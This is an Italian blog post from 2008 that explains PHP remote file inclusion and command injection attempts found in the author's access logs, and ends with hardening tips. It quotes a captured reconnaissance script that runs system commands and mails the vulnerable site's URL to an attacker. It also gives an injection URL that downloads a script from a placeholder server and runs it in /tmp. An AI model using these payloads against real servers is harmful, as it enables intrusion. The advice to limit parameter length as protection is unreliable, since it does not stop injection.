PhP exploit, occhio a quell’exec!
Posted on gennaio 14, 2008
Filed Under php, plugs, programmazione | Leave a Comment Visited 1068 Times |
E' da un po che noto nei log degli accessi al mio blog delle richieste molto simili, ecco un esempio:
</p><p>/test.php?page=http://rootscan.110mb.com/rootlab.jpg?: 1 Time(s)<br />/pagina.php?doc=http://www.usipime.com/adpics/response???: 2 Time(s)</p><p>
Incuriosito visito gli indirizzi ed ecco cosa spuntano fuori diversi tipi di script in bash o php, qualcosa tipo:
</p><div align="left"><?echo "ALBANIA<br>";$alb = @php_uname();<br />$alb2 = system(uptime);<br />$alb3 = system(id);<br />$alb4 = @getcwd();<br />$alb5 = getenv("SERVER_SOFTWARE");<br />$alb6 = phpversion();<br />$alb7 = $_SERVER['SERVER_NAME'];<br />$alb8 = gethostbyname($SERVER_ADDR);<br />$alb9 = get_current_user();<br />$os = @PHP_OS;<br />echo "os: $os<br>";<br />echo "uname -a: $alb<br>";<br />echo "uptime: $alb2<br>";<br />echo "id: $alb3<br>";<br />echo "pwd: $alb4<br>";<br />echo "user: $alb9<br>";<br />echo "phpv: $alb6<br>";<br />echo "SoftWare: $alb5<br>";<br />echo "ServerName: $alb7<br>";<br />echo "ServerAddr: $alb8<br>";<br />echo "PADDY<br>";<br />$to = "XXXXXXX@XXXXX.XXX";$msg = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];mail($to,"Site Vuln",$msg);exit;?></div><p>
Ma che bug sfrutterebbe ? Cioe come viene eseguito sto simpatico script ? Php e' cosi buggoso ? Vediamo un po…
Immaginiamo di avere tra le rige dei nostri script PHP qualcosa di questo tipo:
</p><? php<br />...<br />$par=$_GET['var1'];<br />...<br />shell_exec("$cmd $par");<br />...?><p>
Normalmente utilizzeremmo lo script usando il comodo url: http://sito.bla.bla/script.php?var1=parametro
Ma, cosa succede se eseguiamo qualcosa di questo tipo?
</p><p>"http://sito.bla.bla/script.php?var1=parametro;cd%20/tmp;</p><p>wget%20http://server.bla.bla/script_cattivello.sh;</p><p>chmod%20755%20script_cattivello.sh;./script_cattivello.sh"</p><p>(l'url va scritto tutto su 1 riga) </p><p>
La risposta viene spontanea, var1 prende il valore del parametro assegnato, ma subito dopo viene eseguito un cambio directory in tmp, viene scaricato uno script ad hoc ( script_cattivello.sh ), viene impostato come eseguibile ed infine eseguito.
Ovviamente il file sara' di proprieta' dell'utente www o www-data, insomma dell'utente che esegue apache ( o altro eventuale webserver), ma, almeno in questa fase, tali permessi sono piu che abbastanza per ficcare il naso dove non si deve!
Cosa si puo fare per evitare che questo accada ?
Evitare l'utilizzo di certe funzioni, tipo shell_exec;
Impostare php.ini alcuni limiti, anche se queste limitazioni bloccano alcune funzioni della maggior parte dei cms come joomla , wordpress, horde etc…
</p><p>disable_functions = show_source, exec, shell_exec, system, popen, proc_open, proc_nice, ini_restore, passthru,dl</p><p>
Controllare sempre la lungezza dei parametri in ingresso nei nostri script, mai lasciare un get($var) senza un limite di dimensione.
Questa e' una regola di buona scrittura per qualsiasi applicazione e valida per qualsiasi linguaggio. E' il miglior modo per evitare problemi, bug, errori.
No related posts.
Comments
Leave a Reply
